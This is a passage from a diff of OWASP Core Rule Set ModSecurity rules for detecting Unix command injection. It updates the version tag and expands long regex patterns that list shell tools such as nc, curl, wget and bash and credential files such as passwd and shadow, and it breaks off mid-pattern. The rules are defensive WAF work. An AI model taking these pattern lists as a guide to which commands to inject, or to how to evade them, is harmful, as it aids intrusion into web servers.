+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\n\r;`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|[<>]\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[arx])?|(?:(?:b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z|x)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z|h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|[ckz][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?f|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)|f[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[dg]|g[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[&,<>\|]|(?:[\--\.0-9A-Z_a-z][\"'\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?)+[\s\v&,<>\|]).*|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?g)|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b|l[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:s|z[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:4|[\s\v&\),<>\|].*))|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|x[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z)|r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*)?|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|(?:e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|(?:s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?h)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n)|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?3[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m)\b" \
     "id:932230,\
     phase:2,\
     block,\
@@ -25,11 +25,11 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\n\r;`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|[<>]\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:a(?:dduser|getty|l(?:ias|pine)[\s\v<>]|nsible-playbook|pt-get|r(?:ch[\s\v<>]|ia2c)|s(?:cii(?:-xfr|85)|pell)|tobm)|b(?:a(?:s(?:e(?:32|64|nc)|h)|tch[\s\v<>])|pftrace|r(?:eaksw|idge[\s\v<>])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\v<>]|zip2)|s(?:ctl|ybox))|yebug|z(?:c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2|less|more))|c(?:a(?:ncel|psh)[\s\v<>]|ertbot|h(?:attr|dir[\s\v<>]|eck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|flags|mod|o(?:om|wn)|root)|o(?:(?:b|pro)c|lumn[\s\v<>]|m(?:m(?:and[\s\v<>])?|p(?:oser|ress[\s\v<>]))|w(?:say|think))|p(?:an|io|ulimit)|r(?:ash[\s\v<>]|ontab)|s(?:plit|vtool)|u(?:psfilter|rl))|d(?:(?:a(?:sh|te)|i(?:alog|ff))[\s\v<>]|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\v<>]|sbox)|pkg|vips)|e(?:(?:asy_instal|va)l|cho[\s\v<>]|fax|grep|macs|n(?:d(?:if|sw)|v-update)|sac|x(?:ec[\s\v<>]|iftool|p(?:(?:and|(?:ec|or)t)[\s\v<>]|r)))|f(?:acter|(?:etch|lock)[\s\v<>]|grep|i(?:le(?:[\s\v<>]|test)|(?:n(?:d|ger)|sh)[\s\v<>])|o(?:ld[\s\v<>]|reach)|ping|tp(?:stats|who)|unction)|g(?:awk|core|e(?:ni(?:e[\s\v<>]|soimage)|tfacl[\s\v<>])|hci|i(?:mp[\s\v<>]|nsh)|rep[\s\v<>]|tester|unzip|z(?:cat|exe|ip))|h(?:e(?:ad[\s\v<>]|xdump)|i(?:ghlight|story)[\s\v<>]|ost(?:id|name)|ping3|t(?:digest|passwd))|i(?:conv|f(?:config|top)|nstall[\s\v<>]|onice|p(?:6?tables|config)|spell)|j(?:ava[\s\v<>]|exec|o(?:(?:bs|in)[\s\v<>]|urnalctl)|runscript)|k(?:ill(?:[\s\v<>]|all)|nife[\s\v<>]|sshell)|l(?:a(?:st(?:[\s\v<>]|comm|log(?:in)?)|tex[\s\v<>])|dconfig|ess(?:[\s\v<>]|echo|(?:fil|pip)e)|ftp(?:get)?|(?:inks|ynx)[\s\v<>]|o(?:(?:ca(?:l|te)|ok)[\s\v<>]|g(?:inctl|(?:nam|sav)e))|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)|trace|ua(?:la)?tex|wp-(?:d(?:ownload|ump)|mirror|request)|z(?:c(?:at|mp)|diff|[e-f]?grep|less|m(?:a|ore)))|m(?:a(?:il(?:q|x[\s\v<>])?|ke[\s\v<>]|wk)|(?:kdir|utt)[\s\v<>]|locate|o(?:(?:re|unt)[\s\v<>]|squitto)|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:a(?:no[\s\v<>]|sm|wk)|c(?:\.(?:openbsd|traditional)|at)|e(?:ofetch|t(?:(?:c|st)at|kit-ftp))|ice[\s\v<>]|map|o(?:de[\s\v<>]|hup)|ping|roff|s(?:enter|lookup|tat))|o(?:ctave[\s\v<>]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:s(?:swd|te[\s\v<>])|tch[\s\v<>])|df(?:la)?tex|er(?:f|l(?:5|sh)?|ms)|(?:ft|gre)p|i(?:(?:co|ng)[\s\v<>]|dstat|gz)|k(?:exec|g_?info|ill)|opd|rint(?:env|f[\s\v<>])|s(?:ftp|ql)|tar(?:diff|grep)?|ython[^\s\v]|u(?:ppet[\s\v<>]|shd))|r(?:ak(?:e[\s\v<>]|u)|e(?:a(?:delf|lpath)|(?:dcarpet|name|p(?:eat|lace))[\s\v<>]|stic)|l(?:ogin|wrap)|m(?:dir[\s\v<>]|user)|nano|oute[\s\v<>]|pm(?:db|(?:quer|verif)y)|sync|u(?:by[^\s\v]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:(?:ash|nap|plit)[\s\v<>]|c(?:hed|r(?:een|ipt)[\s\v<>])|diff|e(?:ndmail|rvice[\s\v<>]|t(?:arch|env|facl[\s\v<>]|sid))|ftp|h(?:\.distrib|ell|u(?:f|tdown[\s\v<>]))|l(?:eep[\s\v<>]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\v<>])|qlite3|sh(?:-key(?:ge|sca)n|pass)|t(?:art-stop-daemon|dbuf|r(?:ace|ings))|udo|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:il[\s\v<>f]|sk(?:set)?)|c(?:l?sh|p(?:dump|ing|traceroute))|elnet|ftp|ime(?:(?:out)?[\s\v<>]|datectl)|mux|ouch[\s\v<>]|r(?:aceroute6?|off)|shark)|u(?:limit[\s\v<>]|n(?:ame|compress|expand|iq|l(?:ink[\s\v<>]|z(?:4|ma))|(?:pig|x)z|rar|s(?:et|hare)[\s\v<>]|z(?:ip|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:algrind|i(?:ew[\s\v<>]|gr|mdiff|pw|rsh)|olatility)|w(?:a(?:ll|tch)[\s\v<>]|get|h(?:iptail|o(?:ami|is))|i(?:reshark|sh[\s\v<>]))|x(?:args|e(?:la)?tex|mo(?:dmap|re)|pad|term|z(?:c(?:at|mp)|d(?:ec|iff)|[e-f]?grep|less|more))|y(?:arn|elp[\s\v<>])|z(?:athura|c(?:at|mp)|diff|[e-f]?grep|(?:ipdetail|les)s|more|run|s(?:oelim|td)|ypper))" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\n\r;`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|[<>]\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:HEAD|POST|y(?:arn|elp))[\s\v&\)<>\|]|a(?:dd(?:group|user)|getty|l(?:ias|pine)[\s\v&\)<>\|]|nsible-playbook|pt(?:-get|itude[\s\v&\)<>\|])|r(?:ch[\s\v&\)<>\|]|ia2c)|s(?:cii(?:-xfr|85)|pell)|tobm|xel)|b(?:a(?:s(?:e(?:32|64|n(?:ame[\s\v&\)<>\|]|c))|h[\s\v&\)<>\|])|tch[\s\v&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\v&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\v&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu)|z(?:c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more))|c(?:a(?:ncel|psh)[\s\v&\)<>\|]|ertbot|h(?:attr|(?:dir|root)[\s\v&\)<>\|]|eck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\v&\)<>\|]|\+\+)|o(?:(?:b|pro)c|lumn[\s\v&\)<>\|]|m(?:m(?:and[\s\v&\)<>\|])?|p(?:oser|ress)[\s\v&\)<>\|])|w(?:say|think))|p(?:an|io|ulimit)|r(?:ash[\s\v&\)<>\|]|on(?:tab)?)|s(?:plit|vtool)|u(?:psfilter|rl[\s\v&\)<>\|]))|d(?:(?:a(?:sh|te)|i(?:alog|ff))[\s\v&\)<>\|]|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\v&\)<>\|]|sbox)|pkg|vips)|e(?:2fsck|(?:asy_instal|va)l|cho[\s\v&\)<>\|]|fax|grep|macs|n(?:d(?:if|sw)|v-update)|sac|x(?:ec[\s\v&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\v&\)<>\|]|r)))|f(?:acter|(?:etch|lock|unction)[\s\v&\)<>\|]|grep|i(?:le(?:[\s\v&\)<>\|]|test)|(?:n(?:d|ger)|sh)[\s\v&\)<>\|])|o(?:ld[\s\v&\)<>\|]|reach)|ping|tp(?:stats|who))|g(?:awk[\s\v&\)<>\|]|core|e(?:ni(?:e[\s\v&\)<>\|]|soimage)|tfacl[\s\v&\)<>\|])|hci|i(?:mp[\s\v&\)<>\|]|nsh)|r(?:ep[\s\v&\)<>\|]|oup(?:[\s\v&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:ash|i(?:ghlight|story))[\s\v&\)<>\|]|e(?:ad[\s\v&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:conv|f(?:config|top)|nstall[\s\v&\)<>\|]|onice|p(?:6?tables|config)|spell)|j(?:ava[\s\v&\)<>\|]|exec|o(?:(?:bs|in)[\s\v&\)<>\|]|urnalctl)|runscript)|k(?:ill(?:[\s\v&\)<>\|]|all)|nife[\s\v&\)<>\|]|sshell)|l(?:a(?:st(?:[\s\v&\)<>\|]|comm|log(?:in)?)|tex[\s\v&\)<>\|])|dconfig|ess(?:[\s\v&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|(?:inks|ynx)[\s\v&\)<>\|]|o(?:(?:ca(?:l|te)|ok)[\s\v&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)|trace|ua(?:la)?tex|wp-(?:d(?:ownload|ump)|mirror|request)|z(?:4c(?:at)?|c(?:at|mp)|diff|[e-f]?grep|less|m(?:a(?:dec|info)?|ore)))|m(?:a(?:il(?:[\s\v&\)<>q\|]|x[\s\v&\)<>\|])|ke[\s\v&\)<>\|]|ster\.passwd|wk)|k(?:dir[\s\v&\)<>\|]|fifo|nod|temp)|locate|o(?:(?:re|unt)[\s\v&\)<>\|]|squitto)|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|utt[\s\v&\)<>\|]|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:a(?:no[\s\v&\)<>\|]|sm|wk)|c(?:\.(?:openbsd|traditional)|at)|e(?:ofetch|t(?:(?:c|st)at|kit-ftp|plan))|(?:ice|ull)[\s\v&\)<>\|]|map|o(?:de[\s\v&\)<>\|]|hup)|ping|roff|s(?:enter|lookup|tat))|o(?:ctave[\s\v&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:cman|rted|tch)[\s\v&\)<>\|]|s(?:swd|te[\s\v&\)<>\|]))|d(?:f(?:la)?tex|ksh)|er(?:f|l(?:5|sh)?|ms[\s\v&\)<>\|])|(?:ft|gre)p|hp(?:-cgi|[57])|i(?:(?:co|ng)[\s\v&\)<>\|]|dstat|gz)|k(?:exec|g_?info|ill)|opd|rint(?:env|f[\s\v&\)<>\|])|s(?:ed|ftp|ql)|tar(?:diff|grep)?|u(?:ppet[\s\v&\)<>\|]|shd)|wd\.db|ython[^\s\v])|r(?:ak(?:e[\s\v&\)<>\|]|u)|bash|e(?:a(?:delf|lpath)|(?:dcarpet|name|p(?:eat|lace))[\s\v&\)<>\|]|stic)|l(?:ogin|wrap)|m(?:dir[\s\v&\)<>\|]|user)|nano|oute[\s\v&\)<>\|]|pm(?:db|(?:quer|verif)y)|sync|u(?:by[^\s\v]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:(?:ash|nap)[\s\v&\)<>\|]|c(?:hed|r(?:een|ipt)[\s\v&\)<>\|])|diff|e(?:(?:lf|rvice)[\s\v&\)<>\|]|ndmail|t(?:arch|env|facl[\s\v&\)<>\|]|sid))|ftp|h(?:\.distrib|(?:adow|ells)[\s\v&\)<>\|]|u(?:f|tdown[\s\v&\)<>\|]))|l(?:eep[\s\v&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\v&\)<>\|])|p(?:lit[\s\v&\)<>\|]|wd\.db)|qlite3|sh(?:-key(?:ge|sca)n|pass)|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\v&\)<>\|]))|udo|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:il[\s\v&\)<>f\|]|sk(?:[\s\v&\)<>\|]|set))|c(?:l?sh|p(?:dump|ing|traceroute))|elnet|ftp|ime(?:(?:out)?[\s\v&\)<>\|]|datectl)|mux|ouch[\s\v&\)<>\|]|r(?:aceroute6?|off)|shark)|u(?:limit[\s\v&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\v&\)<>\|]|expand|iq|l(?:ink[\s\v&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\v&\)<>\|]|std))|p(?:2date[\s\v&\)<>\|]|date-alternatives)|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:algrind|i(?:ew[\s\v&\)<>\|]|gr|mdiff|pw|rsh)|olatility[\s\v&\)<>\|])|w(?:a(?:ll|tch)[\s\v&\)<>\|]|get|h(?:iptail[\s\v&\)<>\|]|o(?:ami|is))|i(?:reshark|sh[\s\v&\)<>\|]))|x(?:args|e(?:la)?tex|mo(?:dmap|re)|pad|term|z(?:c(?:at|mp)|d(?:ec|iff)|[e-f]?grep|less|more))|z(?:athura|c(?:at|mp)|diff|e(?:grep|ro[\s\v&\)<>\|])|f?grep|ip(?:c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|less|more|run|s(?:oelim|td(?:(?:ca|m)t|grep|less)?)|ypper))" \
     "id:932235,\
     phase:2,\
     block,\
@@ -45,7 +45,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -66,7 +66,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -86,7 +86,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -106,7 +106,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -126,11 +126,11 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/88',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|=)[\s\v]*(?:t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[ar])?|(?:b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z|x)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z|c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:c|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|(?:g[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c|n)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c|(?:h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u|r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b|[kz][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|l[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[sz]|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:h[\"'\)\[-\x5